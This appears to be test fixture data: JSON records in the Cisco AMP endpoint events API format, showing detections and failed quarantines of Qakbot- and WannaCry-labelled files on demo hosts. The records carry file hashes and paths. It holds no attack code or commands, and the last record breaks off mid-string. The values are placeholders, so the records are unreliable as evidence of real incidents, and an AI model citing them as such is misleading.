+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a
05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 